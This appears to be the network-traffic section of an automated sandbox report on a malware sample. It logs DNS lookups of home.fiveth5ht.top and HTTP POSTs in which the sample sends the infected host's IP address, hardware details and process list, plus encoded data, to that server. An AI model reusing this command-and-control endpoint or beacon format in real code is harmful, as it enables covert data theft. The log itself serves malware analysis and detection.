                                              Dec 27, 2024 09:02:03.660737991 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660765886 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660795927 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660873890 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660887003 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.660976887 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661029100 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661048889 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661216021 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661235094 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661252975 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661334991 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661353111 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661374092 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661537886 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661554098 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661572933 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661634922 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661655903 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661672115 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661689997 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661720037 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661736965 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.661753893 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.708353043 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.712955952 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.713170052 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.779963970 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.779984951 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.780111074 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.780128956 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.780147076 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.780489922 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.780597925 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.781244993 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781264067 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781282902 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781385899 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781404018 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781424046 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781434059 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781507969 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781523943 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781570911 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781586885 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781650066 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781666040 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781790972 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781802893 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781955957 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781974077 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.781991005 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782020092 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782036066 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782056093 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782088995 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782105923 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782121897 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782140017 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782155991 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782172918 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782202005 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782219887 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782233953 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782255888 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782294989 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782310963 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782331944 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782350063 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782447100 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782463074 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782483101 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782500982 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782623053 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782639980 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782695055 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782792091 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782809973 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782829046 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782931089 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782948971 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782959938 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782982111 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.782999992 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.783015013 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.783034086 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.783063889 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.783078909 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.783422947 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.783519983 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.900098085 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900347948 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900362968 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900417089 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900437117 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900511026 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900527000 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900568962 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900588989 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900641918 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900660992 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900738955 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900753021 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900782108 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900873899 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900892019 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900909901 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900964975 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.900980949 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901053905 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901070118 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901165962 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901181936 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901315928 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901334047 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901441097 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901459932 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901490927 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901508093 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901544094 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901591063 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901602983 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901619911 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901648045 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901685953 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901717901 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901750088 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901818991 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901838064 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901904106 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901921034 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.901957035 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902004004 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902091980 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902111053 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902268887 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902375937 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902467966 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902502060 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902519941 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902533054 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902566910 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902582884 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902597904 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.902939081 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:03.903027058 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903043985 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903094053 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903120995 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903170109 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903247118 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903361082 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903372049 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903419971 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903435946 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903469086 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903496981 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903572083 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903589964 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903704882 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903748989 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903909922 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903928995 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.903991938 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904002905 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904066086 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904139996 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904159069 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904189110 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904274940 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904352903 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904421091 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904436111 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904454947 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904465914 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904499054 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904515028 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904561996 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904592037 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904692888 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904711962 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904732943 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904761076 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904846907 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904865026 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904922962 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.904954910 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905025005 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905107021 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905144930 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905184984 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905220032 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905303955 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905320883 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905361891 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905378103 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905396938 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905426025 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:03.905441999 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023538113 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023569107 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023602009 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023622990 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023652077 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023663998 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023777962 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023794889 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023837090 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023855925 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.023984909 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.024003983 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.024069071 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.024115086 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.024175882 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.024290085 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.025191069 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.025208950 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.025304079 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.025320053 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.025419950 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.025437117 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.025466919 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.026397943 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.026418924 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.026510000 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.026530027 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.026578903 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.026612043 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.027529955 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.027625084 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.027640104 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.027661085 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:04.027699947 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:11.959888935 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:11.959932089 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:11.960045099 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:11.960616112 CET4971080192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:12.080118895 CET80497105.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:12.738975048 CET4973780192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:12.858575106 CET80497375.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:12.858685970 CET4973780192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:12.859179974 CET4973780192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:12.978691101 CET80497375.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:14.382074118 CET80497375.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:14.382150888 CET80497375.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:14.382276058 CET4973780192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:14.382749081 CET4973780192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:14.502171993 CET80497375.101.3.217192.168.2.10

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 27, 2024 09:01:57.574990034 CET6386653192.168.2.101.1.1.1
                                              Dec 27, 2024 09:01:57.575182915 CET6386653192.168.2.101.1.1.1
                                              Dec 27, 2024 09:01:57.713411093 CET53638661.1.1.1192.168.2.10
                                              Dec 27, 2024 09:01:57.713502884 CET53638661.1.1.1192.168.2.10
                                              Dec 27, 2024 09:02:01.949676991 CET6386953192.168.2.101.1.1.1
                                              Dec 27, 2024 09:02:01.949784994 CET6386953192.168.2.101.1.1.1
                                              Dec 27, 2024 09:02:02.249692917 CET53638691.1.1.1192.168.2.10
                                              Dec 27, 2024 09:02:02.251534939 CET53638691.1.1.1192.168.2.10
                                              Dec 27, 2024 09:02:12.597645044 CET6278753192.168.2.101.1.1.1
                                              Dec 27, 2024 09:02:12.597757101 CET6278753192.168.2.101.1.1.1
                                              Dec 27, 2024 09:02:12.737907887 CET53627871.1.1.1192.168.2.10
                                              Dec 27, 2024 09:02:12.737946033 CET53627871.1.1.1192.168.2.10

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 27, 2024 09:01:57.574990034 CET192.168.2.101.1.1.10xcee6Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                              Dec 27, 2024 09:01:57.575182915 CET192.168.2.101.1.1.10xb7b7Standard query (0)httpbin.org28IN (0x0001)false
                                              Dec 27, 2024 09:02:01.949676991 CET192.168.2.101.1.1.10x5561Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                              Dec 27, 2024 09:02:01.949784994 CET192.168.2.101.1.1.10x3196Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                              Dec 27, 2024 09:02:12.597645044 CET192.168.2.101.1.1.10xe3a1Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                              Dec 27, 2024 09:02:12.597757101 CET192.168.2.101.1.1.10xca11Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 27, 2024 09:01:57.713502884 CET1.1.1.1192.168.2.100xcee6No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                              Dec 27, 2024 09:01:57.713502884 CET1.1.1.1192.168.2.100xcee6No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                              Dec 27, 2024 09:02:02.249692917 CET1.1.1.1192.168.2.100x5561No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                              Dec 27, 2024 09:02:12.737907887 CET1.1.1.1192.168.2.100xe3a1No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • httpbin.org
                                              • home.fiveth5ht.top

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.10497105.101.3.217808088C:\Users\user\Desktop\PqHnYMj5eF.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 27, 2024 09:02:02.373819113 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                              Host: home.fiveth5ht.top
                                              Accept: */*
                                              Content-Type: application/json
                                              Content-Length: 499951
                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 35 35 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627085559", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                              Dec 27, 2024 09:02:02.493604898 CET9888OUTData Raw: 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58 36 77 36 5c 2f 69 6c 69 6f 30 38 4c 69 4b 2b 45 72 34 69 50 68 7a 34 71 31 63 4c 44 45 59 61 62 70 31 71 61 78 64 4c 67 65 65 46 6e 79 54 56 6e 4b 6e 56 6c 42 70 71 55 5a 4f 4d 6b 33 5c 2f 58 64 44 36 42
                                              Data Ascii: uf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowcYPODyK\/MH4l+Cbn4a\/EPxt8Pru\/g1S58F+KNb8MzalbRSQQX76PqE
                                              Dec 27, 2024 09:02:02.493691921 CET4944OUTData Raw: 72 72 53 76 45 6d 6f 77 7a 4c 50 70 63 73 71 4f 30 63 74 76 4c 42 4c 47 72 6a 34 55 5c 2f 5a 51 5c 2f 34 4c 4b 65 45 50 32 67 50 32 74 5c 2f 47 58 77 59 38 53 36 54 59 2b 44 76 68 6e 34 7a 31 4f 33 30 66 39 6e 50 78 4c 65 72 4a 5a 61 74 71 4f 71
                                              Data Ascii: rrSvEmowzLPpcsqO0ctvLBLGrj4U\/ZQ\/4LKeEP2gP2t\/GXwY8S6TY+Dvhn4z1O30f9nPxLerJZatqOq6cjWzaX44e4uHtYNQ+IUitqXheCBLT+yb\/AOx+Dp21nUtRtr9v1d8G\/tDfCD4g\/FP4n\/Bbwh4003WfiT8HhozePfDkHmrNpY1yDzoGt53RbbVBYO0dlrh06W5GhanPb6ZqptL2eKBv5w4u4K4m4Ixs8BxH4X5
                                              Dec 27, 2024 09:02:02.493794918 CET2472OUTData Raw: 5c 2f 77 42 6d 7a 78 64 70 76 68 50 34 78 2b 46 4e 53 31 36 2b 74 39 4d 30 57 63 61 74 70 32 70 36 68 4b 79 4c 48 62 51 33 75 6b 58 73 64 75 37 6d 53 61 43 50 62 5c 2f 61 43 32 51 59 53 53 48 49 79 45 55 79 2b 58 6a 39 75 64 43 68 2b 48 58 69 71
                                              Data Ascii: \/wBmzxdpvhP4x+FNS16+t9M0Wcatp2p6hKyLHbQ3ukXsdu7mSaCPb\/aC2QYSSHIyEUy+Xj9udCh+HXiqyeK01HS\/FFtf2skc9jcywzRXVncxNHNHPpUwVp7S4hZ45Y7iGaCWMurblyK\/gz6SPHdLw940q4HNMqjnXD\/F2XcMZzjMBUoYyHtMTkWZYmhUjgswo4jDUcLi6+FwNPC4rnlXl9Uq0pSoaUZH+nv0P+Aa\/if4b
